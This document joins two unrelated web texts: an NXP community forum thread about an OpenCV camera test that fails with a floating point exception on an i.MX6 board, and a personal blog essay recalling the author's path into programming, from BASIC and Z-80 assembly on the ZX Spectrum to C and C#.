And now this blog sees the world. After getting inspired by Scott Hanselman with his post “Your words are wasted”, I decided to let it out. Besides this blog will also serve the purpose to follow my efforts into open source software. | https://devblog.ztp.pt/hello-world/ | CC-MAIN-2022-05 | refinedweb | 391 | 72.26 |
Defining thread safety is surprisingly tricky. A quick Google search turns up numerous “definitions” like these:
- Thread-safe code is code that will work even if many Threads are executing it simultaneously.
- A piece of code is thread-safe if it only manipulates shared data structures in a manner that guarantees safe execution by multiple threads at the same time.
And there are more similar definitions.
Don’t you think that definitions like above actually does not communicate anything meaningful and even add some more confusion. Though these definitions can’t be ruled out just like that, because they are not wrong. But the fact is they do not provide any practical help or perspective. How do we make a difference between a thread-safe class and an unsafe one? What do we even mean by “safe”?
What is Correctness in thread safety?
At the heart of any reasonable definition of thread safety is the concept of correctness. So, before understanding the thread-safety we should understand first, this “
correctness“.
Correctness means that a class conforms to its specification.
You will agree that a good class specification will have all information about a class’s state at any given time and it’s post condition if some operation is performed on it..
Having optimistically defined “correctness” as something that can be recognized, we can now define thread safety in a somewhat less circular way: a class is thread-safe when it continues to behave correctly when accessed from multiple threads.
A class is thread-safe if it behaves correctly when accessed from multiple threads, regardless of the scheduling or interleaving of the execution of those threads by the runtime environment, and with no additional synchronization or other coordination on the part of the calling code.
If the loose use of “correctness” here bothers you, you may prefer to think of a thread-safe class as one that is no more broken in a concurrent environment than in a single-threaded environment. Thread-safe classes encapsulate any needed synchronization so that clients need not provide their own.
Example: A Stateless Servlet
A good example of thread safe class is java servlets which have no fields and references, no fields from other classes etc. They are stateless.
public class StatelessFactorizer implements Servlet { public void service(ServletRequest req, ServletResponse resp) { BigInteger i = extractFromRequest(req); BigInteger[] factors = factor(i); encodeIntoResponse(resp, factors); } }.
That’s all for this small but important concept around What is Thread Safety?
Happy Learning !!
Hi Lokesh,
This is a excellent website. Thanks a lot.
Please help me in one query that if My Class is running and I dont want any thread to interrupt it even from another JVM. Then whats should I do ?
Will Class level lock works from another JVM also ?
Threads can access another threads only inside same JVM.
Hi Lokesh,
I just wanted to say you thanks.
Your blog your explanations helping us a lot.Thanks for sharing your knowledge.
Glad, it is of some use. Thanks for sharing your thoughts.
If a method parameters are primitive, each thread can maintain these values in its own stack, what about a method which has reference(s) to other objects as parameters, will each thread then also maintain the state of these objects in thread stack.. how this works.. pls explain,
State of objects will always be on heap not stack. If you have defined the objects with in the method then in this case each thread will have its own copy of objects, hence threadsafe.
Provided that the local objects are not exposed to the outside code. As objects are always created on the heap, they can be changed if a reference is available. | https://howtodoinjava.com/java/multi-threading/what-is-thread-safety/ | CC-MAIN-2020-05 | refinedweb | 617 | 64.41 |
I participated in this year's Facebook Hacker Cup and have enjoyed all the problems so far. The only problem I couldn't solve during the contest was the last problem of Round 2 named "Seafood" (link). Facebook always uploads solutions right after the contest, which I'm thankful for, so I checked the solution for that problem. However, I couldn't see why the solution works just from their description. Maybe I'm not thinking through it enough, but I found it hard to justify their approach in mathematical rigor. So I picked up key ideas from their description and filled out the details. I'm writing this for myself, and it turns out to be more complicated than I thought but I hope this helps some folks out there. If you have any simpler solution/description I'm happy to know.
Here is a short synopsis of the problem. You start at position $$$0$$$ of a number line and move around. There are clams and rocks on the number line. Each clam/rock have distinct positive coordinates and also its own strength as a number. When you are on a position where a clam is placed, you can take the clam immediately and you can hold multiple clams at a time. When you are on a position where a rock is placed, you can use the rock to break open any clam you have with lesser strength. Your goal is to open all the clams in minimum distance moved (or determine that you can't). You should do this in quasilinear time over the number of clams+rocks.
Some facts were evident. For example, there is no harm at picking clams as soon as we meet them. Also, we may assume that the rocks we use decrease in strength, because if we planned to use stronger rock later we can actually skip the weaker one and open the clams with stronger one later. However, this observation turned out to be a red herring as we don't use this assumption in the solution below.
If we move in the left direction on an optimum path, I thought it is because there is a rock we have to use even if we pay the cost of moving back and then forward without getting any clams. With this, one thing that recurred in my mind was that the optimum path should have a particular shape. For example, if this is one possible path
---------------> x<------- -------------> x<------- ----------------->
where 'x' denotes the stone we use, there seemed no reason to use two overlapping intervals and we can just use
--------------------> x<---x-------- ---------------------->
instead. With this, my idea was that the optimum path consists of such disjoint 'Z-shaped' overlapping intervals, ending with
-------------------->
or
--------------------> x<------------
But I couldn't justify any of them formally nor use these observations to find an effective algorithm. In particular, how can we determine where does the path end and how far does the path extend? At that time I felt damn sleepy (after 3 hours of contest it was 5AM here) and gave up. Fortunately I finished at around 160-ish and get the T-shirt and so.
The optimum path should turn its direction or end where either a clam or rock is, or we waste some distance in the middle. Call any interval with endpoints at 0/clam/rocks with no clams nor rocks inside a simple interval. An optimal path will consist of sequence of simple intervals with directions. We will use this observation later.
The optimum path should extend to at least the rightmost clam $$$c_r$$$ because we have to pick it. As soon as we pick $$$c_r$$$, we have collected all the clams so the only thing left to do is to find the rock that opens all the collected yet unopened clams. Therefore, the optimum path will (i) visit $$$c_r$$$ and (ii) move in shortest distance to a rock $$$e$$$ that opens all remaining clams and end. The first key is to assume that we know $$$e$$$ in prior. This takes a bit of courage, but it will completely determine the optimum path and enable us to compute the optimum path effectively. Say the rightmost position we visit is $$$r$$$. We have $$$r = \max(c_r, e)$$$.
The second key is to distinguish between clams that are 'naturally' opened during the journey and clams that need to be carried back(left) to open. Fix arbitrary clam $$$c$$$. (a) If there is a stronger rock $$$r_c$$$ in between $$$c$$$ and $$$r$$$ (inclusive) we will eventually hit $$$r_c$$$ after picking $$$c$$$ by mean value theorem so there is no need to worry about $$$c$$$. (b) Otherwise, we should reach $$$c$$$ to pick and then move to left to find any stronger rock (if exists).
Discard clams of case (a) and for any clam $$$c$$$ of case (b), let's compute the rightmost rock $$$r_c$$$ that is stronger than $$$c$$$, which should be on the left side of $$$c$$$. Then an optimal path sweep through any simple interval inside $$$I_c = [r_c, c]$$$ from right to left at some moment to carry $$$c$$$ to $$$r_c$$$. Take union over such $$$I_c$$$'s and call the union $$$S$$$. Then we see that a simple interval in $$$S \cap [0, e]$$$ has to be swept at least three times (right, then left because the interval is in $$$S$$$, then right to finish at $$$e$$$). All the other simple intervals in $$$[0, e]$$$ has to be swept at least one time (from left to right) and intervals in $$$[e, r]$$$ at least two times (to visit $$$r$$$ and finish at $$$e$$$). This gives an lower bound on the path length; for each simple interval in between $$$[0, r]$$$, multiply its length with its multiplicity and sum over.
Is the lower bound attainable? Yes: Say $$$S = \cup_i [a_i, b_i]$$$ where $$$[a_i, b_i]$$$ are disjoint maximal intervals inside $$$S$$$, ordered so that $$$a_1 < b_1 < a_2 < b_2 < \cdots$$$. Start moving from 0 to right. For each interval $$$[a_i, b_i]$$$ with $$$b_i \leq e$$$, go to $$$b_i$$$ then move back to $$$a_i$$$ and then move in right direction again. Do this in the increasing order of $$$i$$$. After all such intervals are processed, keep moving until we hit $$$r$$$. From $$$r$$$, if the unique interval $$$[a_i, b_i]$$$ such that $$$a_i < e < b_i$$$ exists, move to $$$a_i$$$ and then $$$e$$$. Otherwise, move from $$$r$$$ to $$$e$$$ directly. By definition this path attains the multiplicity bound described in previous paragraph. Also, this path sweeps each $$$[a_i, b_i]$$$ from right to left at some point, so all clams $$$c$$$ are carried to $$$r_c$$$ as $$$[r_c, c] \subseteq [a_i, b_i]$$$ for some $$$i$$$. Therefore, we have found the optimum path assuming the value of $$$e$$$.
It only remains to compute $$$S$$$ (the multiplicity of each simple interval) effectively as we change over $$$e$$$. Iterate $$$e$$$ over all rocks from right to left. As $$$e$$$ moves from right to left, intervals of form $$$[r_c, c]$$$ only adds up, so as one interval $$$I = [r_c, c]$$$ forms we can just update $$$S$$$ by $$$S := S \cup I$$$. This can be done effectively by various means (maintain $$$S$$$ or its complement as
std::set, union-find, etc). For each update, observe the simple intervals added to $$$S$$$ and update the length of optimum path. As each simple interval adds to $$$S$$$ at most once, the total time taken is the number of simple interval times multiplied by time taken for adding an interval to $$$S$$$. This makes the total time quasilinear over the number of clams/rocks (I'm being sketchy here. Please let me know if you want the details).
#include <iostream> #include <algorithm> #include <cstdio> #include <vector> #include <set> #include <string> using namespace std; long long solve(int n, vector<int> p, vector<int> h, const string &s); int main() { int T; scanf("%d", &T); for (int t = 1; t <= T; t++) { int n; scanf("%d", &n); long long a, b, c, d; vector<int> p(n); scanf("%d %d %lld %lld %lld %lld", &p[0], &p[1], &a, &b, &c, &d); for (int i = 2; i < n; i++) p[i] = ((a * p[i - 2] + b * p[i - 1] + c) % d) + 1; vector<int> h(n); scanf("%d %d %lld %lld %lld %lld", &h[0], &h[1], &a, &b, &c, &d); for (int i = 2; i < n; i++) h[i] = ((a * h[i - 2] + b * h[i - 1] + c) % d) + 1; string s; cin >> s; printf("Case #%d: %lld\n", t, solve(n, p, h, s)); } return 0; } struct thing { int p, h; char t; int data; thing() {} thing(int p, int h, char t) : p(p), h(h), t(t) {} }; const int tmax = 1048575; const int inf = 1000000000; struct FenwickTree { int tree[tmax + 1]; void clear() { for (int i = 1; i <= tmax; i++) tree[i] = -inf; } FenwickTree() { clear(); } void upd(int i, int val) { i++; while (i <= tmax) { tree[i] = max(tree[i], val); i += (i & -i); } } int calc(int i) { i++; if (i <= 0) return -inf; assert(1 <= i && i <= tmax); int res = tree[i]; while (i > 0) { res = max(res, tree[i]); i -= (i & -i); } return res; } }; struct IntervalUnion { set<int> complement; vector<int> weights; long long weight = 0LL; IntervalUnion(vector<int> w) : weights(w) { for (int i = 0; i <= tmax; i++) complement.insert(i); } void add(int i, int j) { auto l = complement.lower_bound(i); auto u = complement.lower_bound(j); for (auto it = l; it != u; it++) { weight += weights[*it]; } complement.erase(l, u); } bool subtract(int i) { if (complement.count(i) == 0) { complement.insert(i); weight -= weights[i]; return true; } else { return false; } } }; vector<int> pivots[tmax]; long long solve( int n, vector<int> p, vector<int> h, const string &s) { vector<thing> things(n); for (int i = 0; i < n; i++) things[i] = thing(p[i], h[i], s[i]); sort(things.begin(), things.end(), [](const thing &t1, const thing &t2) { return t1.p < t2.p; }); sort(h.begin(), h.end()); h.resize(unique(h.begin(), h.end()) - h.begin()); for (auto &t : things) { t.h = lower_bound(h.begin(), h.end(), t.h) - h.begin(); t.h = int(h.size()) - 1 - t.h; } FenwickTree ft; for (int i = 0; i < n; i++) { if (things[i].t == 'R') { ft.upd(things[i].h, i); } else { things[i].data = ft.calc(things[i].h - 1); } } vector<int> weights(n); for (int i = 0; i < n; i++) weights[i] = things[i].p - (i == 0 ? 0 : things[i - 1].p); IntervalUnion iu(weights); ft.clear(); for (int i = 0; i <= tmax; i++) pivots[i].clear(); for (int i = n - 1; i >= 0; i--) { if (things[i].t == 'R') { ft.upd(things[i].h, -i); } else { int cc = ft.calc(things[i].h - 1); if (cc == -inf) { // no rock in forward to handle if (things[i].data < 0) return -1; else { iu.add(things[i].data + 1, i + 1); } } else { assert(-cc >= 0 && -cc < n); pivots[-cc].push_back(i); } } } long long ans = 1000000000000000000LL; long long cans; bool met_clam = false; long long clam_pos = -1LL; for (int i = n - 1; i >= 0; i--) { if (things[i].t == 'R') { if (!met_clam) { cans = things[i].p + 2LL * iu.weight; } else { // met_clam cans = 2LL * clam_pos - things[i].p + 2LL * iu.weight; } ans = min(ans, cans); } else if (!met_clam) { met_clam = true; clam_pos = things[i].p; } if (things[i].t == 'R' && !met_clam) { for (auto clamback : pivots[i]) { iu.add(things[clamback].data + 1, clamback + 1); } } iu.subtract(i); } return ans; } | https://codeforces.com/blog/entry/68395 | CC-MAIN-2019-51 | refinedweb | 1,913 | 80.01 |
Seb
Sounds great! Looking forward to it.
Seb
Thank you both for your help. I am going to do some lessons on using return in functions as I’ve realised I don’t fully understand it.
7upser, I didn’t realise you could iterate without it being in a list so have removed that, and also simplified it so there isn’t two functions directly after each other changing the same variable. Is that something thats just ‘best practise?’ (Although just a fledgling hobby at the moment I don’t want to pick up bad habits)
Mikael that is a frustratingly short solution! I have a lot to learn. Thanks for your help.
Here is the code now it works :) I just need to convert to letters which i’ll look at shortly.
keys = '12233333333337777777777' sameletter = True def splitter(keys): global sameletter split_letters = [] buffer = [] previousdigit = '' for digit in keys: if digit in {previousdigit, "''"}: check_buffer_len(buffer, previousdigit) else: sameletter = False if sameletter == True: buffer.append(digit) previousdigit = digit else: split_letters.append(buffer) buffer = [] buffer.append(digit) previousdigit = digit split_letters.append(buffer) print(split_letters) def check_buffer_len(buffer, previousdigit): global sameletter if len(buffer) < 3: sameletter = True return if len(buffer) < 4 and previousdigit in {'7','9'}: sameletter = True else: sameletter = False
Seb
but i get
NameError: name 'split_letters' is not defined
Thanks, have edited it now. Do you still get ‘split_letters’ is not defined? The code runs for me but I just get a blank output ‘[ ]’
Seb
@Seb, please surround your code with three back ticks (```) to make it readable.
Meanwhile, of course, there already is a function for the grouping. The following gives you a list of tuples, where the first item is the key pressed, and the second is how many times it was pressed.
import itertools digits = [ (key, len(list(grouper))) for key, grouper in itertools.groupby('4433555555666') ] print(digits)
Thanks! now edited.
groupby is interesting, thanks for that suggestion. My original reasoning for splitting the digits up though, is if the string has ‘333333’ it would end up being ‘333’, ‘333’ and translate to ‘f’,’f’ eventually. However if it was ‘777777’ you can press 7 four times not three, so the grouping would end up ‘7777’, ‘77’.
I am trying to find an elegant solution to splitting the numbers either when they change or when they’ve reached the repeat limit (and cycle to the next letter)
If i run the groupby solution I would end up with (‘3’, 6), (‘7’, 6) which could be useful but would then still need splitting again, if you see what I mean?
Seb
Hi, I am pretty new to coding in general and have been following lots of tutorials to try and learn python. I am attempting a question from one of the tutorials, translating digits to letters. way I thought of initially was to split all the letters into their corresponding groups before translating them. So a string ‘1223333’ would end up being ‘1’, ‘22’, ‘333’, ‘3’. I am aiming to check the digit in the string, see if it is the same as the previous digit, if not move the digit into the final string, and add the new digit into the buffer to correctly split the numbers into their groups.
Here is what I have so far, but I can’t seem to get the True/ False variables to change, so everything ends up in the buffer + final string!
keys = '1223333' keylist = list(keys) global sameletter sameletter = True def splitter(keylist): split_letters = [] buffer = [] previousdigit = '' for digit in keylist: check_previous(digit, previousdigit) check_buffer_len(buffer, previousdigit) if sameletter == True: buffer.append(digit) previousdigit = digit else: split_letters.append(buffer) buffer.clear buffer.append(digit) previousdigit = digit print(split_letters) def check_previous(digit, previousdigit): if digit != previousdigit: sameletter = False def check_buffer_len(buffer, previousdigit): if len(buffer) == 3: if previousdigit in {'7','9'}: sameletter = True else: sameletter = False splitter(keys)
I think the problem, looking through it with the debugger, is that the sameletter variable never actually changes to false? Would anybody be able to help
Thanks!
Seb
Just wanted to say as a complete beginner this is really helpful! I look forward to the next episode :) | https://forum.omz-software.com/user/seb | CC-MAIN-2021-17 | refinedweb | 694 | 62.58 |
12 July 2012 17:09 [Source: ICIS news]
LONDON (ICIS)--PSA Peugeot Citroen’s plans to close an assembly plant in France, will have a serious impact on chemical companies which supply plastics, rubber and glass parts for car manufacturers, sources said on Thursday.
French carmaker PSA announced it would cut 8,000 jobs and close one of its assembly plants in Aulnay, near ?xml:namespace>
A PSA spokesperson said: "The project presented today is that production will stop at our Aulnay site with manufacturing being then centred at our Poissy plant [near
“At the moment we are burning €200m cash a month so now we would like to stop it and get back to breakeven levels by the end of 2014, as we do not believe market fundamentals will change," PSA's spokesman said.
"We are being realistic in our approach, although we do not deny the market will remain tough," he added.
One PC buyer said: “I expect [other] car makers will shut down for prolonged maintenances around Christmas because the market is oversupplied and output will have to be reduced.”
Most sources agreed that the fundamental problem is that demand has declined far more in 2012 than anybody had anticipated. Coupled with high feedstock costs, suppliers to the automotive industry are now struggling, which will also have a negative impact on upstream markets.
To drive sales up, car manufacturers in
Italian car-maker Fiat's latest initiative offered consumers €1/litre petrol for three years if they bought a new car in June or July in
"I think it shows how desperate Fiat is to increase sales and it remains to be seen how effective this strategy is," a PC buyer said.
New car registrations are expected to decrease by about 7% in 2012 compared with 2011. Sales are expected to drop from 13.1m last year to 12.2m this year, according to data from the European Automobile Manufacturers' Association (ACEA).
It is estimated that about 4-7kg of PC is used in each car for headlamps, switches, rooftops and other parts, a PC-part supplier said.
"The outlook for the European vehicle market in 2012 has further worsened due to the challenging economic situation in many of the EU member states. Though not all manufacturers are affected to the same extent, vehicle production in
The industry has proven to be extremely resilient in recent years, but optimising competitiveness is key in an increasingly globalised world, McLaughlin added.
It isnot all doom and gloom. Most car manufacturers expect growth in emerging markets, such as
"It is clear that growth in the next ten years will be outside of Europe, in emerging markets such as
However, with falling car sales and dwindling consumer confidence it is clear the automotive industry, and its suppliers, are in for a rough ride in coming years.
According to industry sources, replacement car and small vehicle tyre sales have dropped by 10-15%, while truck tyre sales are down by 30-40% in May compared with the same period last year, depending on region of
Flat glass manufacturers are also facing an uphill battle. Although most of their demand comes from the construction industry, a dip in sales from the automotive sector can have a negative influence on their earnings.
Coating and paint demand has also declined significantly since last year, mainly driven by falling sales to the automotive and construction sectors. Producers and buyers of epoxy resins and titanium dioxide, main ingredients for paints and coatings used to protect the body of a car, have said demand for their products has fallen by about 15-20% so far this year.
As a result of slowing downstream demand, chemical output is certain to fall. And with budget cuts and massive deficits, it is near certain that governments will be unable to step in to help ailing industries.
"Considering that most manufacturers are losing money | http://www.icis.com/Articles/2012/07/12/9577968/PSAs-plant-closure-to-have-negative-impact-on-chems.html | CC-MAIN-2014-52 | refinedweb | 652 | 53.04 |
Back to: ASP.NET Core Tutorials For Beginners and Professionals
Introduction to ASP.NET Core MVC Framework
In this article, I am going to give you a brief introduction to ASP.NET Core MVC Framework. Please read our previous article where we discussed Developer Exception Page Middleware Components in ASP.NET Core Application. As part of this article, we are going to discuss the following pointers.
- What is MVC?
- How MVC Design Pattern Works?
- Understanding Model, View, and Controller.
- Where the MVC Design Pattern is used in the real-time three-layer application?
- What is ASP.NET Core MVC?
What is MVC?
MVC stands for Model View and Controller. It is an architectural design pattern that means this design pattern is used at the architecture level of an application. So, the point that you need to remember is MVC is not a programming language, MVC is not a Framework, it is a design pattern. When we design an application, first we create the architecture of that application, and MVC plays an important role in the architecture of that particular application.
MVC Design Pattern is basically used to develop interactive applications. An interactive application is an application where there is user interaction involved and based on the user interaction some event handling occurred. The most important point that you need to remember is, it is not only used for developing web-based applications but also we can use this MVC design pattern to develop the Desktop or mobile-based application.
The MVC (Model-View-Controller) design pattern was introduced in the 1970s which divides an application into 3 major components. They are Model, View, and Controller. The main objective of the MVC design pattern is the separation of concerns. It means the domain model and business logic are separated from the user interface (i.e. view). As a result, maintaining and testing the application becomes simpler and easier.
How does MVC Design Pattern work in ASP.NET Core?
Let us see an example to understand how the MVC pattern works in the ASP.NET Core MVC application. For example, we want to design an application, where we need to display the student details on a web page as shown below.
So, when we issue a request something like “” from a web browser then the following things are happening in order to handle the request.
The controller is the component in the MVC design pattern, who actually handles the incoming request. In order to handle the request, the controller components do several things are as follows. The controller component creates the model that is required by a view. The model is the component in the MVC design pattern which basically contains classes that are used to store the domain data or you can say business data.
In the MVC design pattern, the Model component also contains the required logic in order to retrieve the data from a database. Once the model created by the controller, then the controller selects a view to render the domain data or model data. While selecting a view, it is also the responsibility of the controller to pass the model data.
In the MVC design pattern, the only responsibility of view is to render the model data. So, in MVC, the view is the component whose responsibility is to generate the necessary HTML in order to render the model data. Once the HTML is generated by the view, then that HTML is then sent to the client over the network, who initially made the request.
So, the three major components of an ASP.NET Core MVC Application are Model, View, and Controller. Let us discuss each of these components of the MVC design pattern in detail.
Model:
The Model is the component in the MVC Design pattern which is used to manage that data i.e. state of the application in memory. The Model represents a set of classes that are used to describe the application’s validation logic, business logic, and data access logic. So in our example, the model consists of Student class and the StudentBusinessLayer class.
public class Student { public int StudentID { get; set; } public string Name { get; set; } public string Gender { get; set; } public string Branch { get; set; } public string Section { get; set; } } public class StudentBusinessLayer { public IEnumerable<Student> GetAll() { //logic to return all employees } public Student GetById(int StudentID) { //logic to return an employee by employeeId Student student = new Student() { StudentID = StudentID, Name = "James", Gender = "Male", Branch = "CSE", Section = "A2", }; return student; } public void Insert(Student student) { //logic to insert an student } public void Update(Student student) { //logic to Update an student } public void Delete(int StudentID) { //logic to Delete an student } }
Here, in our example, we use the Student class to hold the student data in memory. The StudentBusinessLayer class is used to manage the student data i.e. going to perform the CRUD operation.
So, in short, we can say that a Model in MVC design pattern contains a set of classes that is used to represent the data and also contains the logic to manage those data. In our example, the Student class is the class that is used to represent the data. The StudentBusinessLayer class is the class that is used to manage the Student data.
View:
The view component in the MVC Design pattern is used to contain the logic to represent the model data as a user interface with which the end-user can interact. Basically, the view is used to render the domain data (i.e. business data) which is provided to it by the controller.
For example, we want to display Student data in a web page. In the following example, the Student model carried the student data to the view. As already discussed, the one and only responsibility of the view is to render that student data. The following code does the same thing.
@model ASPCoreApplication.Models.Student <html> <head> <title>Student Details</title> </head> <body> <br/> <br/> <table> <tr> <td>Student ID: </td> <td>@Model.StudentID</td> </tr> <tr> <td>Name: </td> <td>@Model.Name</td> </tr> <tr> <td>Gender: </td> <td>@Model.Gender </td> </tr> <tr> <td>Branch: </td> <td>@Model.Branch</td> </tr> <tr> <td>Section: </td> <td>@Model.Section </td> </tr> </table> </body> </html>
Controller:
A Controller is a .cs (for C# language) file which has some methods called Action Methods. When a request comes on the controller, it is the action method of the controller which will handle those requests.
The Controller is the component in an MVC application that is used to handle the incoming HTTP Request and based on the user action, the respective controller will work with the model and view and then sends the response back to the user who initially made the request. So, it is the one that will interact with both the models and views to control the flow of application execution. In our example, when the user issued a request the following URL
Then that request is mapped to the Details action method of the Student Controller. How it will map to the Details action method of the Student Controller that will discuss in our upcoming articles.
public class StudentController : Controller { public ActionResult Details(int studentId) { StudentBusinessLayer studentBL = new StudentBusinessLayer(); Student studentDetail = studentBL.GetById(studentId); return View(studentDetail); } }
As you can see in the example, the Student Controller creates the Student object within the Details action method. So, here the Student is the Model. To fetch the Student data from the database, the controller uses the StudentBusinessLayer class.
Once the controller creates the Student model with the necessary student data, then it passes that Student model to the Details view. The Details view then generates the necessary HTML in order to present the Student data. Once the HTML is generated, then this HTML is sent to the client over the network who initially made the request.
Note: In the MVC design pattern both the Controller and View depend on the Model. But the Model never depends on either view or controller. This is one of the main reasons for the separation of concerns. This separation of concerns allows us to build the model and test independently of the visual presentation.
Where MVC is used in the real-time three-layer application?
In general, a real-time application may consist of the following layers
- Presentation Layer: This layer is responsible for interacting with the user.
- Business Layer: This layer is responsible for implementing the core business logic of the application.
- Data Access Layer: This layer is responsible for interacting with the database to perform the CRUD operations.
The MVC design pattern is basically used to implement the Presentation Layer of the application. Please have a look at the following diagram.
What is ASP.NET Core MVC?
The ASP.NET Core MVC is a lightweight, open-source, highly testable presentation framework that is used for building web apps and Web APIs using the Model-View-Controller (MVC) design pattern. So, the point that you need to remember is, MVC is a design pattern and ASP.NET Core MVC is the framework that is based on MVC Design Pattern.
The ASP.NET Core MVC Framework provides us with a patterns-based way to develop dynamic websites and web apps with a clean separation of concerns. This ASP.NET Core MVC framework provides us the full control over the mark-up. It also supports for Test-Driven Development and also uses the latest web standards.
In the next article, we are going to discuss how to set up the MVC middleware in asp.net core application. In this article, I try to give a brief introduction to ASP.NET Core MVC Framework. I would like to have your feedback. Please post your feedback, question, or comments about this ASP.NET Core MVC framework article.
5 thoughts on “Introduction to ASP.NET Core MVC Framework”
Please correct : Where MVC is used in real-time there layer application?
to
Where MVC is used in real-time three layer application?
Hi,
Thanks for identifying the typographical error. We have corrected it.
This is raviteja from hyderabad.I learned ASP.NET CORE MVC from this website.It is really really great tutorials that are very easy to understand and very informative.Please update the remaining concepts of ASP.NET CORE MVC.I am eagerly waiting for that.I will share this website to all my friends..
Thanks for the detailed explanation.I have learned all the .NET framework related concepts in your tutorial.
Now .NET team released .NET5. Can we use all these concepts in .NET 5 also? I am eagerly waiting for your reply.
Thanks for the detailed expanation | https://dotnettutorials.net/lesson/introduction-asp-net-core-mvc/ | CC-MAIN-2022-27 | refinedweb | 1,782 | 57.77 |
The objective of this post is to explain how to find mDNS services advertised in the LinkIt Smart using the ESP8266.
Introduction
The objective of this post is to explain how to find mDNS services advertised in the LinkIt Smart using the ESP8266.
Although we are creating a very simple use case, this will be an architecture that could be employed in real use case scenarios.
We assume the use of the ESP8266 libraries for the Arduino IDE. We also assume that the LinkIt Smart is already configured to connect to a WiFi network.
Creating the LinkIt Smart mDNS service
Setting the configuration file in the LinkIt Smart for the new service is pretty straightforward, and you can check a detailed explanation in this previous post.
The configuration file for this service will be very simple and is shown bellow. We just need to put it in the /etc/avahi/services directory so the Avahi daemon can advertise it. Name the file espserver.service and put it in the previously mentioned directory. The easiest way to do it is using the WinSCP tool.
<?xml version="1.0" standalone='no'?><!--*-nxml-*--> <!DOCTYPE service-group SYSTEM "avahi-service.dtd"> <service-group> <name replace-ESP8266 server</name> <service> <type>_espserver._tcp</type> <port>90</port> <txt-record>path=/</txt-record> </service> </service-group>
From the configuration file, we can easily see that our service will be called espserver and the transport protocol will be TCP. Also, the service will be available on port 90.
Naturally, we are just configuring the advertisement of a hypothetical service, since we will not implement it. So, it’s important to understand that we are not developing the actual service, just telling the other devices/applications in the network that there is a service available in the IP of the LinkIt Smart, on port 90, with the name espserver.
After uploading the configuration file, we just need to tell the avahi daemon to reload the service configuration files. To to do, just send the command bellow in the LinkIt Smart console.
avahi-daemon -r
The new mDNS service should now be visible to other applications. We can use, for example, the mDNS browser application for Google Chrome, which should list the new service, as seen in figure 1.
Figure 1 – The new LinkIt Smart service advertised on the network.
ESP8266 code
First of all, we will need to include two libraries, one for the functionality needed to connect the ESP8266 to a WiFi network and the other for the mDNS methods.
#include <ESP8266WiFi.h> #include <ESP8266mDNS.h>
We will do all our coding in the setup function. Since connecting to a WiFi network was already explained in this post, we will focus on the mDNS functionalities.
Most of the functionalities of the mDNS library are available through an extern variable called MDNS. This MDNS variable is an object of class MDNSResponder. Nevertheless, we don’t need to know the low level details since they are handled for us in an easy to use interface.
First, we start by calling the begin method on the MDNS object to setup the mDNS functionalities. This method receives as argument the name of the host, in this case, our ESP8266. We can call it whatever we want, as long as the name is smaller than 63 characters.
Since the begin method returns false when some initialization problem occurs, it’s a good practice to check the return value of the function.
if (!MDNS.begin("ESP")) { Serial.println("Error setting up mDNS"); }
After that, if no error occurs, we can send our mDNS query to check for the service we want. In this case, we will use the queryService method, also on the MDNS object. This method receives as first argument the name of the service and as second argument the primary transport protocol.
From our .service configuration file, we specified the name of the service as “espserver” and the primary transport protocol as “tcp“. Those are the arguments to be used.
It’s important to take in consideration that the output of this method is an integer, indicating the number of services that match the name and protocol and are found in the network.
int n = MDNS.queryService("espserver", "tcp");
Finally, we check if some service was found and we can get the host, IP and port of the LinkIt Smart service.
To find the hostname, we just call the hostname method on the MDNS object. To get the IP, we call the IP method. To get the port, we call the port method. You can check the source code of those methods here.
Since many services could have been found, the 3 methods mentioned before receive as argument the index of the service to which we want to retrieve the information. In this case, since we are operating in a controlled use case, we know that we only have a LinkIt Smart with this service, so we can use index zero. Nevertheless, in a real application scenario, we should iterate all the services to decide which host we want to connect to.
if (n == 0) { Serial.println("No service found"); } else { Serial.println("Service found"); Serial.println("Host: " + String(MDNS.hostname(0))); Serial.print("IP : " ); Serial.println(MDNS.IP(0)); Serial.println("Port: " + String(MDNS.port(0))); }
You can check the whole final code bellow, which also includes the connection to the WiFi network and the empty main loop function.
#include <ESP8266WiFi.h> #include <ESP8266mDNS.h> const char* ssid = "Your network"; const char* password = "Your network password"; void setup() { Serial.begin(115200); delay(100); Serial.println(); WiFi.begin(ssid, password); while (WiFi.status() != WL_CONNECTED) { delay(250); Serial.print("."); } Serial.println("Connection to AP established"); if (!MDNS.begin("ESP")) { Serial.println("Error setting up mDNS"); } Serial.println("mDNS setup finished"); Serial.println("Sending mDNS Query"); int n = MDNS.queryService("espserver", "tcp"); if (n == 0) { Serial.println("No service found"); } else { Serial.println("Service found"); Serial.println("Host: " + String(MDNS.hostname(0))); Serial.print("IP : " ); Serial.println(MDNS.IP(0)); Serial.println("Port: " + String(MDNS.port(0))); } } void loop() { }
Final result
After uploading the ESP8266 code, just open the serial monitor from the Arduino IDE and check the output. You should get something similar to figure 2.
Figure 2 – LinkIt Smart mDNS service information.
So, the host is “mylinkit”, which is the default host name configured in the LinkIt Smart for mDNS services.
The IP is the address of the LinkIt Smart on your WiFi network (which will most probably be different from mine).
Finally, the port is the one we specified in the .service configuration file.
Application use cases
Although all of the mDNS concept may seem a little complicated when we are working in a controlled environment where we can easily know the IPs of all the devices, in a real application IoT scenario we may not know the IPs that will be assigned to the deployed nodes.
So, mDNS offers a really useful solution to resolve names into IPs and to check the services available in a network without the need for a dedicated and centralized infra-structure.
If we think in a commercial application where the LinkIt Smart works as a gateway and there are many nodes implemented with ESP8266 devices, we want the user to be able to just connect the nodes and the nodes to automatically find the gateway.
With mDNS, this is easily done since all the ESP8266 can be programmed to look for a certain service name when they connect to a WiFi network. So, after they find it, they simply get the IP address of the gateway and the port where the gateway server is listening, and they can start communicating with it.
Related Posts
- LinkIt Smart Duo: Configuring mDNS services
- LinkIt Smart Duo: Connection to WiFi Network
- Linkit Smart Duo: Getting started
- ESP8266 Webserver: Resolving an address with mDNS
Related content
Technical details
- ESP8266 libraries: v2.3.0 | https://techtutorialsx.com/2016/12/04/esp8266-query-linkit-smart-mdns-services/ | CC-MAIN-2017-26 | refinedweb | 1,325 | 55.34 |
Object Construction and Destruction
Contents
- Local and Global Variables
- Reference Types
- Functions in C++
- Basic Input and Output
- Creating and Destroying Objects - Constructors and Destructors
1. Local and Global Variables
(Ref. Lippman 8.1-8.3)
Local variables are objects that are only accessible within a single function (or a sub-block within a function.) Global variables, on the other hand, are objects that are generally accessible to every function in a program. It is possible, though potentially confusing, for a local object and a global object to share the same name. In following example, the local object x shadows the object x in the global namespace. We must therefore use the global scope operator, ::, to access the global object.
main_file.C
float x; // A global object.
int main () {
float x; // A local object with the same name.
x = 5.0; // This refers to the local object.
